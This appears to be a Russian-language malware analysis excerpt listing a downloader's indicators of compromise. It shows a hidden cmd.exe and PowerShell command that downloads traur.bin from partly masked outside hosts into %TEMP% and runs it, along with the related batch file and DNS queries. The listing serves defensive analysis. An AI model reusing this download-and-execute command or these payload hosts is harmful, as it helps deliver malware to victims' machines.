Техническая информация
- $qhcrq0 как %temp%\fvahw-koqag.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Zgcfq1([String] $qhcrq0){(New-Object System.Net.WebClient).DownloadFile($qhcrq0,''%TEMP%\fvahw-koqag.exe'');Start-Process ''%TEMP%\fvahw-koqag.exe'';}try{Z...
- %TEMP%\mqwo.bat
- %TEMP%\fvahw-koqag.exe
- 'ca####delteatro.it':80
- 'rs###tria.com':80
- http://ca####delteatro.it/traur.bin
- http://rs###tria.com/traur.bin
- http://www.rs###tria.com/traur.bin
- DNS ASK ca####delteatro.it
- DNS ASK rs###tria.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Zgcfq1([String] $qhcrq0){(New-Object System.Net.WebClient).DownloadFile($qhcrq0,''%TEMP%\fvahw-koqag.exe'');Start-Process ''%TEMP%\fvahw-koqag.exe'';}try{Z...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Mqwo.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Mqwo.bat" "